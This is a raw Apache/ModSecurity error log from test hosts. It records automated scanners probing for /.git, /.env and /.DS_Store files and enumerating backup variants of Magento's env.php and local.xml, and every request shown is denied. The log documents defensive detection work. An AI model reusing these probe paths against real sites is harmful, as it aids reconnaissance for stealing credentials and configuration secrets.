[Sat Jan 04 06:20:07.736580 2025] [:error] [pid 243637] [client 45.141.215.116:36744] [client 45.141.215.116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z3jFB9txrB9RU3J-QwcBHAAAAAI"]
[Sat Jan 04 06:20:13.321317 2025] [:error] [pid 243638] [client 23.154.177.28:46890] [client 23.154.177.28] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z3jFDXPQSBVzJgmNEz9zHAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Sat Jan 04 06:20:13.321939 2025] [:error] [pid 243638] [client 23.154.177.28:46890] [client 23.154.177.28] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z3jFDXPQSBVzJgmNEz9zHAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Sat Jan 04 06:20:13.322445 2025] [:error] [pid 243638] [client 23.154.177.28:46890] [client 23.154.177.28] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z3jFDXPQSBVzJgmNEz9zHAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Sat Jan 04 06:20:29.181988 2025] [:error] [pid 243636] [client 109.70.100.70:35218] [client 109.70.100.70] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z3jFHR0d9CHSK2cupOXMeQAAAAE"]
[Sat Jan 04 06:20:29.182640 2025] [:error] [pid 243636] [client 109.70.100.70:35218] [client 109.70.100.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z3jFHR0d9CHSK2cupOXMeQAAAAE"]
[Sat Jan 04 06:20:29.183231 2025] [:error] [pid 243636] [client 109.70.100.70:35218] [client 109.70.100.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z3jFHR0d9CHSK2cupOXMeQAAAAE"]
[Sat Jan 04 06:20:38.898342 2025] [:error] [pid 244375] [client 185.220.101.13:63642] [client 185.220.101.13] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z3jFJnKj3wOkApLAbjaYsQAAAAY"]
[Sat Jan 04 06:20:38.898977 2025] [:error] [pid 244375] [client 185.220.101.13:63642] [client 185.220.101.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z3jFJnKj3wOkApLAbjaYsQAAAAY"]
[Sat Jan 04 06:20:38.899480 2025] [:error] [pid 244375] [client 185.220.101.13:63642] [client 185.220.101.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z3jFJnKj3wOkApLAbjaYsQAAAAY"]
[Sat Jan 04 09:41:06.328753 2025] [:error] [pid 243635] [client 185.172.52.24:59206] [client 185.172.52.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3j0IkZ7NcX4QDsnmc8GMAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com:80/.env
[Sat Jan 04 09:41:06.329052 2025] [:error] [pid 243635] [client 185.172.52.24:59206] [client 185.172.52.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3j0IkZ7NcX4QDsnmc8GMAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com:80/.env
[Sat Jan 04 09:41:06.329273 2025] [:error] [pid 243635] [client 185.172.52.24:59206] [client 185.172.52.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3j0IkZ7NcX4QDsnmc8GMAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com:80/.env
[Sun Jan 05 19:10:13.903563 2025] [:error] [pid 265374] [client 45.130.203.185:31299] [client 45.130.203.185] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3rLBecRJTWIDn3q4Z4crQAAAAc"]
[Sun Jan 05 19:10:13.905157 2025] [:error] [pid 265374] [client 45.130.203.185:31299] [client 45.130.203.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3rLBecRJTWIDn3q4Z4crQAAAAc"]
[Sun Jan 05 19:10:13.905527 2025] [:error] [pid 265374] [client 45.130.203.185:31299] [client 45.130.203.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3rLBecRJTWIDn3q4Z4crQAAAAc"]
[Mon Jan 06 11:18:30.789143 2025] [:error] [pid 286458] [client 45.130.203.219:6209] [client 45.130.203.219] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut9uA25kCuceD7m5OduAAAAAQ"]
[Mon Jan 06 11:18:30.789715 2025] [:error] [pid 286458] [client 45.130.203.219:6209] [client 45.130.203.219] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut9uA25kCuceD7m5OduAAAAAQ"]
[Mon Jan 06 11:18:30.790193 2025] [:error] [pid 286458] [client 45.130.203.219:6209] [client 45.130.203.219] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut9uA25kCuceD7m5OduAAAAAQ"]
[Mon Jan 06 12:04:30.088771 2025] [:error] [pid 286457] [client 45.130.203.233:60669] [client 45.130.203.233] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3u4vt8HeacmHywkC2G5rAAAAAM"]
[Mon Jan 06 12:04:30.089185 2025] [:error] [pid 286457] [client 45.130.203.233:60669] [client 45.130.203.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3u4vt8HeacmHywkC2G5rAAAAAM"]
[Mon Jan 06 12:04:30.089554 2025] [:error] [pid 286457] [client 45.130.203.233:60669] [client 45.130.203.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3u4vt8HeacmHywkC2G5rAAAAAM"]
[Wed Jan 08 18:52:03.823737 2025] [authz_core:error] [pid 329780] [client 185.146.232.19:37794] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php
[Wed Jan 08 18:52:05.004369 2025] [authz_core:error] [pid 334573] [client 185.146.232.19:35946] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php2
[Wed Jan 08 18:52:06.437117 2025] [authz_core:error] [pid 329748] [client 185.146.232.19:35952] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_
[Wed Jan 08 18:52:07.732088 2025] [authz_core:error] [pid 341402] [client 185.146.232.19:35962] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_backup
[Wed Jan 08 18:52:08.996834 2025] [authz_core:error] [pid 341404] [client 185.146.232.19:35974] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_back
[Wed Jan 08 18:52:10.418992 2025] [authz_core:error] [pid 341403] [client 185.146.232.19:35984] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_bak
[Wed Jan 08 18:52:11.620501 2025] [authz_core:error] [pid 329749] [client 185.146.232.19:35992] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_bk
[Wed Jan 08 18:52:12.800398 2025] [authz_core:error] [pid 341401] [client 185.146.232.19:36002] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.backup
[Wed Jan 08 18:52:13.961383 2025] [authz_core:error] [pid 332286] [client 185.146.232.19:36014] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.back
[Wed Jan 08 18:52:15.251000 2025] [authz_core:error] [pid 341399] [client 185.146.232.19:37142] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.bak
[Wed Jan 08 18:52:16.468859 2025] [authz_core:error] [pid 329780] [client 185.146.232.19:37158] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.bk
[Wed Jan 08 18:52:22.675525 2025] [authz_core:error] [pid 334573] [client 185.146.232.19:37164] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpbackup
[Wed Jan 08 18:52:23.840537 2025] [authz_core:error] [pid 329748] [client 185.146.232.19:37172] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpback
[Wed Jan 08 18:52:25.306983 2025] [authz_core:error] [pid 341402] [client 185.146.232.19:47704] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpbak
[Wed Jan 08 18:52:26.763726 2025] [authz_core:error] [pid 341404] [client 185.146.232.19:47710] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpbk
[Wed Jan 08 18:52:27.935715 2025] [authz_core:error] [pid 341403] [client 185.146.232.19:47726] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.1
[Wed Jan 08 18:52:29.121388 2025] [authz_core:error] [pid 329749] [client 185.146.232.19:47736] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.2
[Wed Jan 08 18:52:30.431353 2025] [authz_core:error] [pid 341401] [client 185.146.232.19:47752] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php1
[Wed Jan 08 18:52:31.594947 2025] [authz_core:error] [pid 332286] [client 185.146.232.19:47760] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.test
[Wed Jan 08 18:52:32.760994 2025] [authz_core:error] [pid 341399] [client 185.146.232.19:47776] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.live
[Wed Jan 08 18:52:33.924904 2025] [authz_core:error] [pid 329780] [client 185.146.232.19:47788] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.local
[Wed Jan 08 18:52:35.096795 2025] [authz_core:error] [pid 334573] [client 185.146.232.19:50614] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.staging
[Wed Jan 08 18:52:36.257374 2025] [authz_core:error] [pid 329748] [client 185.146.232.19:50628] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml
[Wed Jan 08 18:52:37.526950 2025] [authz_core:error] [pid 341402] [client 185.146.232.19:50632] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml2
[Wed Jan 08 18:52:38.684627 2025] [authz_core:error] [pid 341404] [client 185.146.232.19:50640] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_
[Wed Jan 08 18:52:39.847889 2025] [authz_core:error] [pid 341403] [client 185.146.232.19:50650] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_bak
[Wed Jan 08 18:52:41.119596 2025] [authz_core:error] [pid 329749] [client 185.146.232.19:50660] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_backup
[Wed Jan 08 18:52:42.306338 2025] [authz_core:error] [pid 341401] [client 185.146.232.19:50676] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_back
[Wed Jan 08 18:52:43.467505 2025] [authz_core:error] [pid 332286] [client 185.146.232.19:50692] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_bk
[Wed Jan 08 18:52:44.712604 2025] [authz_core:error] [pid 341399] [client 185.146.232.19:50694] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.backup
[Wed Jan 08 18:52:46.094894 2025] [authz_core:error] [pid 329780] [client 185.146.232.19:57276] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.back
[Wed Jan 08 18:52:47.345672 2025] [authz_core:error] [pid 334573] [client 185.146.232.19:57284] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.bak
[Wed Jan 08 18:52:49.190609 2025] [authz_core:error] [pid 329748] [client 185.146.232.19:57298] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.bk
[Wed Jan 08 18:52:50.351424 2025] [authz_core:error] [pid 341402] [client 185.146.232.19:57300] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlbackup
[Wed Jan 08 18:52:51.676681 2025] [authz_core:error] [pid 341404] [client 185.146.232.19:57308] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlback
[Wed Jan 08 18:52:52.839485 2025] [authz_core:error] [pid 341403] [client 185.146.232.19:57310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlbak
[Wed Jan 08 18:52:54.062968 2025] [authz_core:error] [pid 329749] [client 185.146.232.19:57324] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlbk
[Wed Jan 08 18:52:55.562424 2025] [authz_core:error] [pid 341401] [client 185.146.232.19:53664] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.1
[Wed Jan 08 18:52:57.040915 2025] [authz_core:error] [pid 332286] [client 185.146.232.19:53672] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.2
[Wed Jan 08 18:52:58.628630 2025] [authz_core:error] [pid 341399] [client 185.146.232.19:53676] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml1
[Wed Jan 08 18:52:59.844489 2025] [authz_core:error] [pid 329780] [client 185.146.232.19:53686] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.test
[Wed Jan 08 18:53:01.369488 2025] [authz_core:error] [pid 334573] [client 185.146.232.19:53690] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.live
[Wed Jan 08 18:53:02.540387 2025] [authz_core:error] [pid 329748] [client 185.146.232.19:53698] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.local
[Wed Jan 08 18:53:03.935075 2025] [authz_core:error] [pid 341402] [client 185.146.232.19:53708] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.staging
[Thu Jan 09 10:22:21.884947 2025] [authz_core:error] [pid 351760] [client 128.199.119.93:55424] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/laravel-filemanager
[Sun Jan 12 12:41:19.079434 2025] [:error] [pid 416187] [client 109.205.213.58:37326] [client 109.205.213.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4OqX_eUzzDyvBXMr_lI-wAAAAM"]
[Sun Jan 12 12:41:19.081706 2025] [:error] [pid 416187] [client 109.205.213.58:37326] [client 109.205.213.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4OqX_eUzzDyvBXMr_lI-wAAAAM"]
[Sun Jan 12 12:41:19.082179 2025] [:error] [pid 416187] [client 109.205.213.58:37326] [client 109.205.213.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4OqX_eUzzDyvBXMr_lI-wAAAAM"]
[Sun Jan 12 12:41:19.655655 2025] [:error] [pid 416185] [client 109.205.213.58:37334] [client 109.205.213.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z4OqX5uxCxtSO2ix-aIAYgAAAAE"]
[Sun Jan 12 12:41:19.656220 2025] [:error] [pid 416185] [client 109.205.213.58:37334] [client 109.205.213.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z4OqX5uxCxtSO2ix-aIAYgAAAAE"]
[Sun Jan 12 12:41:19.656628 2025] [:error] [pid 416185] [client 109.205.213.58:37334] [client 109.205.213.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z4OqX5uxCxtSO2ix-aIAYgAAAAE"]
